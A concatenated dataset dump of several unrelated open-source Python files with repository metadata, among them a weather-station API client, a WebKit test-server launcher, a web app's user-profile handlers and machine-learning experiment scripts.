time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardRunDataRequest(
tensorboard_run="tensorboard_run_value",
time_series_data=time_series_data,
)
# Make the request
response = client.write_tensorboard_run_data(request=request)
# Handle the response
print(response)
# [END aiplatform_generated_aiplatform_v1_TensorboardService_WriteTensorboardRunData_sync]
| [
"[email protected]"
] | |
57485776a4ffeae26eb959d8100093431ae0bddf | 5152422abf6208bf631bc3322f4491e5589c1ee0 | /volttron/SolarAgent/solaragent/pyowm/stationsapi30/stations_manager.py | 402e54a7017c4f135590b3acc524febf55e9bcc3 | [] | no_license | wietlabs/volttron-optimizer | e74fc3e53176b4130a1b1c31ec9a393cd404e94c | 0c06db6842209d5a9b58ba5a76c04a3764f626e9 | refs/heads/master | 2022-11-08T19:27:07.450103 | 2020-06-17T17:57:28 | 2020-06-17T17:57:28 | 268,601,158 | 0 | 0 | null | 2020-06-17T11:10:19 | 2020-06-01T18:29:48 | Python | UTF-8 | Python | false | false | 10,995 | py | """
Object that can read/write meteostations metadata and extract related
measurements
"""
from pyowm.commons.http_client import HttpClient
from pyowm.stationsapi30.parsers.station_parser import StationParser
from pyowm.stationsapi30.parsers.aggregated_measurement_parser import AggregatedMeasurementParser
from pyowm.stationsapi30.uris import STATIONS_URI, NAMED_STATION_URI, MEASUREMENTS_URI
from pyowm.constants import STATIONS_API_VERSION
class StationsManager(object):
"""
A manager objects that provides a full interface to OWM Stations API. Mainly
it implements CRUD methods on Station entities and the corresponding
measured datapoints.
:param API_key: the OWM web API key
:type API_key: str
:returns: a *StationsManager* instance
:raises: *AssertionError* when no API Key is provided
"""
def __init__(self, API_key):
assert API_key is not None, 'You must provide a valid API Key'
self.API_key = API_key
self.stations_parser = StationParser()
self.aggregated_measurements_parser = AggregatedMeasurementParser()
self.http_client = HttpClient()
def stations_api_version(self):
return STATIONS_API_VERSION
# STATIONS Methods
def get_stations(self):
"""
Retrieves all of the user's stations registered on the Stations API.
:returns: list of *pyowm.stationsapi30.station.Station* objects
"""
status, data = self.http_client.get_json(
STATIONS_URI,
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
return [self.stations_parser.parse_dict(item) for item in data]
def get_station(self, id):
"""
Retrieves a named station registered on the Stations API.
:param id: the ID of the station
:type id: str
:returns: a *pyowm.stationsapi30.station.Station* object
"""
status, data = self.http_client.get_json(
NAMED_STATION_URI % str(id),
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
return self.stations_parser.parse_dict(data)
def create_station(self, external_id, name, lat, lon, alt=None):
"""
Create a new station on the Station API with the given parameters
:param external_id: the user-given ID of the station
:type external_id: str
:param name: the name of the station
:type name: str
:param lat: latitude of the station
:type lat: float
:param lon: longitude of the station
:type lon: float
:param alt: altitude of the station
:type alt: float
:returns: the new *pyowm.stationsapi30.station.Station* object
"""
assert external_id is not None
assert name is not None
assert lon is not None
assert lat is not None
if lon < -180.0 or lon > 180.0:
raise ValueError("'lon' value must be between -180 and 180")
if lat < -90.0 or lat > 90.0:
raise ValueError("'lat' value must be between -90 and 90")
if alt is not None:
if alt < 0.0:
raise ValueError("'alt' value must not be negative")
status, payload = self.http_client.post(
STATIONS_URI,
params={'appid': self.API_key},
data=dict(external_id=external_id, name=name, lat=lat,
lon=lon, alt=alt),
headers={'Content-Type': 'application/json'})
return self.stations_parser.parse_dict(payload)
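
    # Minimal usage sketch (illustrative only; the API key and the station
    # values are assumed, not part of this module):
    #
    #   mgr = StationsManager('my-api-key')
    #   st = mgr.create_station('SF_TEST001', 'San Francisco Test Station',
    #                           37.76, -122.43, alt=150)
    #   print(mgr.get_station(st.id).name)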
def update_station(self, station):
"""
Updates the Station API record identified by the ID of the provided
*pyowm.stationsapi30.station.Station* object with all of its fields
:param station: the *pyowm.stationsapi30.station.Station* object to be updated
:type station: *pyowm.stationsapi30.station.Station*
:returns: `None` if update is successful, an exception otherwise
"""
assert station.id is not None
status, _ = self.http_client.put(
NAMED_STATION_URI % str(station.id),
params={'appid': self.API_key},
data=dict(external_id=station.external_id, name=station.name,
lat=station.lat, lon=station.lon, alt=station.alt),
headers={'Content-Type': 'application/json'})
def delete_station(self, station):
"""
Deletes the Station API record identified by the ID of the provided
*pyowm.stationsapi30.station.Station*, along with all its related
measurements
:param station: the *pyowm.stationsapi30.station.Station* object to be deleted
:type station: *pyowm.stationsapi30.station.Station*
:returns: `None` if deletion is successful, an exception otherwise
"""
assert station.id is not None
status, _ = self.http_client.delete(
NAMED_STATION_URI % str(station.id),
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
# Measurements-related methods
def send_measurement(self, measurement):
"""
Posts the provided Measurement object's data to the Station API.
:param measurement: the *pyowm.stationsapi30.measurement.Measurement*
object to be posted
:type measurement: *pyowm.stationsapi30.measurement.Measurement* instance
:returns: `None` if creation is successful, an exception otherwise
"""
assert measurement is not None
assert measurement.station_id is not None
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=[self._structure_dict(measurement)],
headers={'Content-Type': 'application/json'})
def send_measurements(self, list_of_measurements):
"""
Posts data about the provided list of Measurement objects to the
Station API. The objects may be related to different station IDs.
:param list_of_measurements: list of *pyowm.stationsapi30.measurement.Measurement*
objects to be posted
:type list_of_measurements: list of *pyowm.stationsapi30.measurement.Measurement*
instances
:returns: `None` if creation is successful, an exception otherwise
"""
assert list_of_measurements is not None
assert all([m.station_id is not None for m in list_of_measurements])
msmts = [self._structure_dict(m) for m in list_of_measurements]
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=msmts,
headers={'Content-Type': 'application/json'})
def get_measurements(self, station_id, aggregated_on, from_timestamp,
to_timestamp, limit=100):
"""
Reads measurements of a specified station recorded in the specified time
window and aggregated on minute, hour or day. Optionally, the number of
resulting measurements can be limited.
:param station_id: unique station identifier
:type station_id: str
:param aggregated_on: aggregation time-frame for this measurement
:type aggregated_on: string between 'm','h' and 'd'
:param from_timestamp: Unix timestamp corresponding to the beginning of
the time window
:type from_timestamp: int
:param to_timestamp: Unix timestamp corresponding to the end of the
time window
:type to_timestamp: int
:param limit: max number of items to be returned. Defaults to 100
:type limit: int
:returns: list of *pyowm.stationsapi30.measurement.AggregatedMeasurement*
objects
"""
assert station_id is not None
assert aggregated_on is not None
assert from_timestamp is not None
assert from_timestamp > 0
assert to_timestamp is not None
assert to_timestamp > 0
if to_timestamp < from_timestamp:
raise ValueError("End timestamp can't be earlier than begin timestamp")
assert isinstance(limit, int)
assert limit >= 0
query = {'appid': self.API_key,
'station_id': station_id,
'type': aggregated_on,
'from': from_timestamp,
'to': to_timestamp,
'limit': limit}
status, data = self.http_client.get_json(
MEASUREMENTS_URI,
params=query,
headers={'Content-Type': 'application/json'})
return [self.aggregated_measurements_parser.parse_dict(item) for item in data]
def send_buffer(self, buffer):
"""
Posts to the Stations API data about the Measurement objects contained
into the provided Buffer instance.
:param buffer: the *pyowm.stationsapi30.buffer.Buffer* instance whose
measurements are to be posted
:type buffer: *pyowm.stationsapi30.buffer.Buffer* instance
:returns: `None` if creation is successful, an exception otherwise
"""
assert buffer is not None
msmts = [self._structure_dict(m) for m in buffer.measurements]
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=msmts,
headers={'Content-Type': 'application/json'})
def _structure_dict(self, measurement):
d = measurement.to_dict()
item = dict()
item['station_id'] = d['station_id']
item['dt'] = d['timestamp']
item['temperature'] = d['temperature']
item['wind_speed'] = d['wind_speed']
item['wind_gust'] = d['wind_gust']
item['wind_deg'] = d['wind_deg']
item['pressure'] = d['pressure']
item['humidity'] = d['humidity']
item['rain_1h'] = d['rain_1h']
item['rain_6h'] = d['rain_6h']
item['rain_24h'] = d['rain_24h']
item['snow_1h'] = d['snow_1h']
item['snow_6h'] = d['snow_6h']
item['snow_24h'] = d['snow_24h']
item['dew_point'] = d['dew_point']
item['humidex'] = d['humidex']
item['heat_index'] = d['heat_index']
item['visibility_distance'] = d['visibility_distance']
item['visibility_prefix'] = d['visibility_prefix']
item['clouds'] = [dict(distance=d['clouds_distance']),
dict(condition=d['clouds_condition']),
dict(cumulus=d['clouds_cumulus'])]
item['weather'] = [
dict(precipitation=d['weather_precipitation']),
dict(descriptor=d['weather_descriptor']),
dict(intensity=d['weather_intensity']),
dict(proximity=d['weather_proximity']),
dict(obscuration=d['weather_obscuration']),
dict(other=d['weather_other'])]
return item | [
"[email protected]"
] | |
ab360bec8cf99a92bbc1598f7170bfff77391d5f | d866c0dca34a7ce98bf6c965ee54bcb6f6042f33 | /source/week_5_part_1.py | 4dc3b8ac477ae5b804297312dd66f8ef296ac3dd | [] | no_license | RasselJohn/ML | 0b8acf57602a484a30aa51d57c2286c65944c8e8 | a3742176e73fd7329639ce1a86582a79f2634e81 | refs/heads/master | 2021-08-02T07:20:25.474284 | 2021-07-25T11:56:41 | 2021-07-25T11:56:41 | 146,184,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | # Композиция алгоритмов
# Random forest
# Regression
import pandas
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import KFold, cross_val_score
from source import create_answer_file
data = pandas.read_csv(r'..\data\abalone.csv')
# encode Sex numerically: 'M' -> 1, 'F' -> -1, anything else (infants, 'I') -> 0
data['Sex'] = data['Sex'].map(lambda x: 1 if x == 'M' else (-1 if x == 'F' else 0))
X = data[[col for col in data.columns if col != 'Rings']]
y = data['Rings']
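
# The loop below evaluates forests of growing size with 5-fold shuffled
# cross-validation (scoring='r2', the coefficient of determination) and stops
# at the first size whose mean score exceeds 0.52, writing it to the answer file.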
for estimators_count in range(1, 51):
clf = RandomForestRegressor(n_estimators=estimators_count, random_state=1)
clf.fit(X, y)
k_fold = KFold(n_splits=5, shuffle=True, random_state=1)
scores = cross_val_score(clf, X, y, cv=k_fold, scoring='r2')
if scores.mean() > 0.52:
create_answer_file('w5_1.txt', f'{estimators_count}')
break
| [
"Rassel"
] | Rassel |
1659481855f03de945b35b46a831242522f624fe | 8698757521458c2061494258886e5d3cdfa6ff11 | /core/adversarial/accuracy_repeated_reconstructions.py | e5a3818ba69a8a7afb6c10a7dea992487a9635d7 | [
"MIT"
] | permissive | ricvo/argo | 546c91e84d618c4bc1bb79a6bc7cba01dca56d57 | a10c33346803239db8a64c104db7f22ec4e05bef | refs/heads/master | 2023-02-25T01:45:26.412280 | 2020-07-05T22:55:35 | 2020-07-05T22:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,330 | py | import numpy as np
import tensorflow as tf
import pdb
import argparse
from tensorflow.examples.tutorials.mnist import input_data
from datasets.Dataset import Dataset
from core.argo.core.ArgoLauncher import ArgoLauncher, get_full_id
from core.argo.core.TrainingLauncher import TrainingLauncher
from core.argo.core.TFDeepLearningModel import load_model, load_network
from vae.core.VAE import GaussianVariationalAutoEncoder
from prediction.core.PredictionModel import get_prediction_model
import os
# os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"]='2'
# sess_config = tf.ConfigProto()
# sess_config.gpu_options.allow_growth=True
parser = argparse.ArgumentParser(description='Compute accuracy of repeated reconstructions through VAE', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('model_choice', help = 'The model to use as classifier; choose between: ff, vaeffnos, vaeffs, vffnos, vffs')
parser.add_argument('ffconffile', help = 'The config file associated to the training of the Prediction model to load.')
parser.add_argument('folder_to_load', help = 'The folder where the reconstructions are saved')
parser.add_argument('--data_rank', '-rk', help = 'The tensor rank of data; rk = 2 for MLP, rk = 4 for Conv.', default = 4)
parser.add_argument('--autoencconffile', '-ae', help = 'The config file associated to the training of the autoencoder model to load.', default = None)
parser.add_argument('--global_step_vae', help = 'The global_step at which we want to restore VAE model. Default is the last one found in the folder.', default=None)
parser.add_argument('--global_step_ff', help = 'The global_step at which we want to restore Prediction model. Default is the last one found in the folder.', default=None)
parser.add_argument('--gpu', '-gpu', help = 'GPU where to run on.', default = '0')
args = parser.parse_args()
model_choice = args.model_choice
ffconffile = args.ffconffile
folder_to_load = args.folder_to_load
data_rank = int(args.data_rank)
autoencconffile = args.autoencconffile
global_step_vae = args.global_step_vae
global_step_ff = args.global_step_ff
gpu = args.gpu
seed = 120
parallelism = 0 # 0 is equivalent to single
###################
### SOME CHECKS ###
###################
# FF has: logits
# VAEFF has: mean, cov, reconstr, logits
# VFF has: mean, cov, logits
if(model_choice not in ['ff', 'vaeffnos', 'vaeffs', 'vffnos', 'vffs']):
raise ValueError("Choose a correct model!")
if(model_choice[0] == 'v'):
if(autoencconffile is None):
raise ValueError("Either you chose the wrong model or you didn't specify an autoencoder conf file!")
if(model_choice[0] == 'f'):
if(autoencconffile is not None):
raise ValueError("FF requires no autoencoder!")
###################
## LOAD DATASETS ##
###################
ffmodeldir = os.path.dirname(ffconffile)
ff_dataset_conf, ff_model_parameters, ff_config = ArgoLauncher.process_conf_file(args.ffconffile)
ff_dataset = Dataset.load_dataset(ff_dataset_conf)
if(model_choice[0] == 'v'): #i.e. there is a VAE model
vaemodeldir = os.path.dirname(autoencconffile)
vae_dataset_conf, vae_model_parameters, vae_config = ArgoLauncher.process_conf_file(args.autoencconffile)
vae_dataset = Dataset.load_dataset(vae_dataset_conf)
#if datasets x_shape are different raise Exception! what is the meaning of a comparison otherwise?
assert ff_dataset.x_shape == vae_dataset.x_shape, \
"the VAE and FF network that you are trying to load have been \
trained on datasets with different x_shape : `%s` and `%s`"%(str(ff_dataset.x_shape), str(vae_dataset.x_shape))
x_shape = (None,) + ff_dataset.x_shape
mnist = input_data.read_data_sets("MNIST_data", one_hot=True)
X_train = np.copy(mnist.train.images) #copy the dataset because it will be shuffled afterwards
y_train = np.copy(mnist.train.labels)
X_test = np.copy(mnist.test.images)
y_test = np.copy(mnist.test.labels)
# Load the 10 datasets
X_np = np.zeros((10, 10000, 784), dtype = 'float32')
for i in range(10):
X_np[i] = np.load(folder_to_load + "no" + str(i+1) + ".npy")
if(data_rank == 4):
X_np = X_np.reshape((10, 10000, 28, 28, 1))
################################
## VAE MODEL, GET VAE NETWORK ##
################################
#TODO maybe train here if it has not been trained... ?
# launcher = TrainingLauncher(ModelClass, dataset)
# launcher.run(model_parameters, config, parallelism)
if(model_choice[0] == 'v'): #i.e. there is a VAE model
vae_run = vae_model_parameters["run"]
vae_seed = vae_model_parameters["seed"]
vae_network, vae_checkpoint_name = load_network(GaussianVariationalAutoEncoder, autoencconffile, global_step_vae)
######################################
## PREDICTION MODEL, GET FF NETWORK ##
######################################
#TODO as above, maybe make training.. check if works.. ?
# launcher = TrainingLauncher(ModelClass, dataset)
# launcher.run(model_parameters, config, parallelism)
ff_run = ff_model_parameters["run"]
ff_seed = ff_model_parameters["seed"]
ff_task = ff_model_parameters["task"]
ff_network, ff_checkpoint_name = load_network(get_prediction_model, ffconffile, global_step_ff)
##############################
## SESSION AND CALCULATIONS ##
##############################
# SET THE SEED
tf.set_random_seed(seed)
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = gpu
sess_config = tf.ConfigProto()
sess_config.gpu_options.allow_growth = True
sess = tf.Session(config = sess_config)
x = tf.placeholder(tf.float32, shape=x_shape, name='input')
# LOAD FF NETWORK
logits = ff_network(x)
ff_network.restore(sess, ff_checkpoint_name)
# LOAD VAE NETWORK
if(model_choice[0] == 'v'): #i.e. there is a VAE model
# LOAD VAE NETWORK
model_latent, _, model_visible = vae_network(x)
vae_network.restore(sess, vae_checkpoint_name)
n_z_samples = vae_network.n_z_samples
# CALLABLES FOR CLEVERHANS
encoder_module = vae_network.encoder_module
decoder_module = vae_network.decoder_module
# CALLABLES FOR CLEVERHANS
ff_module = ff_network.module
##############################
###### DEFINE THE MODELS #####
##############################
def ff(x):
logits = ff_module(x)
return logits, None
def vae_ff_nos(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
rec_distr = decoder_module(mean)
recnode = rec_distr.reconstruction_node()
logits = ff_module(recnode)
    return logits, mean, None, recnode  # no covariance in this variant; the callers below only use the logits
def vae_ff_s(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
std = model_latent.scale
cov = tf.square(std)
distr = tf.distributions.Normal(loc = mean, scale = std)
samples = distr.sample(1); samples = tf.reshape(samples, (10000, 20))
rec_distr = decoder_module(samples)
recnode = rec_distr.reconstruction_node()
logits = ff_module(recnode)
return logits, mean, cov, recnode
def v_ff_nos(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
cov = model_latent.covariance()
logits = ff_module(mean)
return logits, mean, cov
def v_ff_s(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
cov = model_latent.covariance()
distr = tf.distributions.Normal(loc = mean, scale = cov)
samples = distr.sample(1)
logits = ff_module(samples)
return logits, mean, cov
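
# How the callables above map onto the CLI choices handled below: ff
# classifies the raw input; vae_ff_nos / vae_ff_s classify the VAE
# reconstruction of the latent mean / of a latent sample; v_ff_nos / v_ff_s
# classify the latent mean / a latent sample directly.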
# Set the model function according to our choice
if(model_choice == 'ff'):
model_function = ff
elif(model_choice == 'vaeffnos'):
model_function = vae_ff_nos
elif(model_choice == 'vaeffs'):
model_function = vae_ff_s
elif(model_choice == 'vffnos'):
model_function = v_ff_nos
elif(model_choice == 'vffs'):
model_function = v_ff_s
# Compute the 10 accuracy numbers
y_tf = tf.constant(y_test)
accuracy_np = [0. for i in range(10)]
for i in range(10):
X_tf = tf.constant(X_np[i])
logits_X_tf = model_function(X_tf)[0]
accuracy = tf.reduce_mean(tf.cast(
tf.equal(tf.argmax(logits_X_tf, axis = 1),
tf.cast(tf.argmax(y_tf, axis = 1), dtype = tf.int64)),
dtype = tf.float32))
accuracy_np[i] = accuracy.eval(session = sess)
print("Accuracy array:", accuracy_np)
| [
"[email protected]"
] | |
3653a5d7e910e73b48d90c9bbccb57a8c8c80049 | 16dbd5e49d52b675f820f20019bd7a052f125a43 | /Tools/Scripts/webkitpy/layout_tests/servers/web_platform_test_server.py | 332c3c32f71fe28fd028f8c5b9e5ec114eb650f3 | [
"BSD-3-Clause"
] | permissive | steveorsomethin/webkit | 614bec0948a7e6a3ecf488e7501b9ac7fa6d9154 | 26fff3c477cee750ae7d5a03263070e98b514398 | refs/heads/master | 2023-05-27T00:22:59.895565 | 2015-02-25T01:43:42 | 2015-02-25T01:43:42 | 31,293,548 | 1 | 0 | null | 2015-02-25T02:34:11 | 2015-02-25T02:34:10 | null | UTF-8 | Python | false | false | 8,458 | py | # Copyright (c) 2014, Canon Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Canon Inc. nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY CANON INC. AND ITS CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CANON INC. AND ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import logging
import sys
import time
from webkitpy.common.system.autoinstall import AutoInstaller
from webkitpy.layout_tests.servers import http_server_base
_log = logging.getLogger(__name__)
def doc_root(port_obj):
doc_root = port_obj.get_option("wptserver_doc_root")
if doc_root is None:
return port_obj.host.filesystem.join("imported", "w3c", "web-platform-tests")
return doc_root
def base_url(port_obj):
config_wk_filepath = port_obj.path_from_webkit_base("LayoutTests", "imported", "w3c", "resources", "config.json")
if not port_obj.host.filesystem.isfile(config_wk_filepath):
# This should only be hit by webkitpy unit tests
_log.debug("No WPT config file found")
return "http://localhost:8800/"
json_data = port_obj._filesystem.read_text_file(config_wk_filepath)
config = json.loads(json_data)
ports = config["ports"]
return "http://" + config["host"] + ":" + str(ports["http"][0]) + "/"
class WebPlatformTestServer(http_server_base.HttpServerBase):
def __init__(self, port_obj, name, layout_test_results_dir, pidfile=None):
http_server_base.HttpServerBase.__init__(self, port_obj)
self._output_dir = layout_test_results_dir
self._name = name
self._log_file_name = '%s_process_log.out.txt' % (self._name)
self._wsout = None
self._process = None
self._pid_file = pidfile
if not self._pid_file:
self._pid_file = self._filesystem.join(self._runtime_path, '%s.pid' % self._name)
self._servers_file = self._filesystem.join(self._runtime_path, '%s_servers.json' % (self._name))
self._stdout_data = None
self._stderr_data = None
self._filesystem = port_obj.host.filesystem
self._layout_root = port_obj.path_from_webkit_base("LayoutTests")
self._doc_root = self._filesystem.join(self._layout_root, doc_root(port_obj))
self._resources_files_to_copy = ['testharness.js', 'testharness.css', 'testharnessreport.js']
current_dir_path = self._filesystem.abspath(self._filesystem.split(__file__)[0])
self._start_cmd = ["python", self._filesystem.join(current_dir_path, "web_platform_test_launcher.py"), self._servers_file]
self._doc_root_path = port_obj.path_from_webkit_base("LayoutTests", self._doc_root)
def _install_modules(self):
modules_file_path = self._filesystem.join(self._layout_root, "imported", "w3c", "resources", "WPTModules")
if not self._filesystem.isfile(modules_file_path):
_log.warning("Cannot read " + modules_file_path)
return
modules = json.loads(self._filesystem.read_text_file(modules_file_path))
for module in modules:
AutoInstaller(target_dir=self._filesystem.join(self._doc_root, module["path"])).install(url=module["url"], url_subpath=module["url_subpath"], target_name=module["name"])
def _copy_webkit_test_files(self):
_log.debug('Copying WebKit resources files')
for f in self._resources_files_to_copy:
webkit_filename = self._filesystem.join(self._layout_root, "resources", f)
if self._filesystem.isfile(webkit_filename):
self._filesystem.copyfile(webkit_filename, self._filesystem.join(self._doc_root, "resources", f))
_log.debug('Copying WebKit web platform server config.json')
config_wk_filename = self._filesystem.join(self._layout_root, "imported", "w3c", "resources", "config.json")
if self._filesystem.isfile(config_wk_filename):
self._filesystem.copyfile(config_wk_filename, self._filesystem.join(self._doc_root, "config.json"))
def _clean_webkit_test_files(self):
_log.debug('Cleaning WPT resources files')
for f in self._resources_files_to_copy:
wpt_filename = self._filesystem.join(self._doc_root, "resources", f)
if self._filesystem.isfile(wpt_filename):
self._filesystem.remove(wpt_filename)
_log.debug('Cleaning WPT web platform server config.json')
config_wpt_filename = self._filesystem.join(self._doc_root, "config.json")
if self._filesystem.isfile(config_wpt_filename):
self._filesystem.remove(config_wpt_filename)
def _prepare_config(self):
if self._filesystem.exists(self._output_dir):
output_log = self._filesystem.join(self._output_dir, self._log_file_name)
self._wsout = self._filesystem.open_text_file_for_writing(output_log)
self._install_modules()
self._copy_webkit_test_files()
def _spawn_process(self):
self._stdout_data = None
self._stderr_data = None
if self._wsout:
self._process = self._executive.popen(self._start_cmd, cwd=self._doc_root_path, shell=False, stdin=self._executive.PIPE, stdout=self._wsout, stderr=self._wsout)
else:
self._process = self._executive.popen(self._start_cmd, cwd=self._doc_root_path, shell=False, stdin=self._executive.PIPE, stdout=self._executive.PIPE, stderr=self._executive.STDOUT)
self._filesystem.write_text_file(self._pid_file, str(self._process.pid))
# Wait a second for the server to actually start so that tests do not start until server is running.
time.sleep(1)
return self._process.pid
def _stop_running_subservers(self):
if self._filesystem.exists(self._servers_file):
try:
json_data = self._filesystem.read_text_file(self._servers_file)
started_servers = json.loads(json_data)
for server in started_servers:
if self._executive.check_running_pid(server['pid']):
_log.warning('Killing server process (protocol: %s , port: %d, pid: %d).' % (server['protocol'], server['port'], server['pid']))
self._executive.kill_process(server['pid'])
finally:
self._filesystem.remove(self._servers_file)
def stop(self):
super(WebPlatformTestServer, self).stop()
# In case of orphaned pid, kill the running subservers if any still alive.
self._stop_running_subservers()
def _stop_running_server(self):
_log.debug('Stopping %s server' % (self._name))
self._clean_webkit_test_files()
if self._process:
(self._stdout_data, self._stderr_data) = self._process.communicate(input='\n')
if self._wsout:
self._wsout.close()
self._wsout = None
if self._pid and self._executive.check_running_pid(self._pid):
_log.warning('Cannot stop %s server normally.' % (self._name))
_log.warning('Killing server launcher process (pid: %d).' % (self._pid))
self._executive.kill_process(self._pid)
self._remove_pid_file()
self._stop_running_subservers()
| [
"[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc"
] | [email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc |
f3d14c4f37f3d61fb7bc19b05ed9d7953bdf6a1e | b4c2fafa90b7775d38581473e7b792999b8037f1 | /handlers/Profile.py | b8e24986caf35e34ec44aeae94aa6642f7607150 | [] | no_license | DamonJie/ihome | 126f84c6f5587d9f65295cc293e392e649bada17 | 8db1ed8441c01f4cfaeb383f311900e2c1ec71bf | refs/heads/master | 2020-04-12T15:39:14.772918 | 2018-12-20T14:43:52 | 2018-12-20T14:43:52 | 162,582,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,932 | py | import logging
import constants
from handlers.BaseHandler import BaseHandler
from utils.response_code import RET
from utils.qiniu_storage import storage
from utils.commons import required_login
class ProfileHandler(BaseHandler):
"""个人信息"""
@required_login
def get(self):
user_id = self.session.data['user_id']
try:
ret = self.db.get_one("select up_name,up_mobile,up_avatar from ih_user_profile where up_user_id=%s", user_id)
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR, "errmsg":"get data error"})
if ret[2]:
img_url = constants.QINIU_URL_PREFIX + ret[2]
else:
img_url = None
self.write({"errcode":RET.OK, "errmsg":"OK",
"data":{"user_id":user_id, "name":ret[0], "mobile":ret[1], "avatar":img_url}})
class NameHandler(BaseHandler):
@required_login
def post(self):
user_id=self.session.data["user_id"]
name=self.json_args.get("name")
if name in (None,""):
return self.write({"errcode":RET.PARAMERR,"errmsg":"params error"})
try:
self.db.update("update ih_user_profile set up_name=%s where up_user_id=%s",(name,user_id))
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR,"errmsg":"name has exist"})
self.session.data["name"]=name
try:
self.session.save()
except Exception as e:
logging.error(e)
self.write({"errcode":RET.OK,"errmsg":"OK"})
class AvatarHandler(BaseHandler):
@required_login
def post(self):
files=self.request.files.get("avatar")
if not files:
            return self.write(dict(errcode=RET.PARAMERR, errmsg="no image uploaded"))
avatar=files[0]["body"]
try:
file_name=storage(avatar)
except Exception as e:
logging.error(e)
            return self.write(dict(errcode=RET.THIRDERR, errmsg="upload failed"))
        # take the user_id from the session data
        user_id = self.session.data["user_id"]
        # save the image name (i.e. the image URL path) to the database
        sql = "update ih_user_profile set up_avatar=%s where up_user_id=%s"
try:
row_count = self.db.update(sql, (file_name,user_id))
except Exception as e:
logging.error(e)
            return self.write(dict(errcode=RET.DBERR, errmsg="failed to save"))
        self.write(dict(errcode=RET.OK, errmsg="saved successfully", data="%s%s" % (constants.QINIU_URL_PREFIX, file_name)))
class AuthHandler(BaseHandler):
@required_login
def get(self):
user_id=self.session.data["user_id"]
try:
ret=self.db.get_one("select up_real_name,up_id_card from ih_user_profile where up_user_id=%s",(user_id,))
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR,"errmsg":"get data failed"})
logging.debug(ret)
if not ret:
return self.write({"errrcode":RET.NODATA,"errmsg":"no data"})
self.write({"errcode":RET.OK,"errmsg":"OK","data":{"real_name":ret[0],"id_card":ret[1]}})
@required_login
def post(self):
user_id = self.session.data["user_id"]
real_name = self.json_args.get("real_name")
id_card = self.json_args.get("id_card")
if real_name in (None, "") or id_card in (None, ""):
return self.write({"errcode": RET.PARAMERR, "errmsg": "params error"})
        # TODO: validate the format of the ID card number
try:
self.db.update("update ih_user_profile set up_real_name=%s,up_id_card=%s where up_user_id=%s",(real_name, id_card, user_id))
except Exception as e:
logging.error(e)
return self.write({"errcode": RET.DBERR, "errmsg": "update failed"})
self.write({"errcode": RET.OK, "errmsg": "OK"}) | [
"[email protected]"
] | |
b195df519818411291df92af9e17a1398789bfd5 | c155d27bf74255b8315603518c5ab76d0638dfea | /uv/serpens/flux_correlation_CN_HCN_log_Jy_v2.py | 749360d463819d4bdba2436ddab099aedfe9d64d | [] | no_license | amirocha/doktorat | 406c2e4476a5a22c863c37eb5f581a369800e936 | 22c90228f6bca9d0b116c73457b7e86ae4462167 | refs/heads/master | 2021-07-05T14:18:26.324886 | 2020-08-03T19:28:50 | 2020-08-03T19:28:50 | 152,316,686 | 0 | 0 | null | 2020-04-03T20:22:37 | 2018-10-09T20:28:29 | Python | UTF-8 | Python | false | false | 4,578 | py | """Flux correlation"""
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stat
import math as m
from scipy.stats import linregress as regr
DIST=436. #Ortiz-Leon 2017
L_sun = 3.86e26 #W
freq = {'CN': 113490985000, 'HCN': 88631847000}  # line rest frequencies [Hz]; the HCN(1-0) value was missing in the source and is filled in here as an assumption
c = 299792458 # m/s
k = 1.38e-23 #Boltzmann constant [J/K]
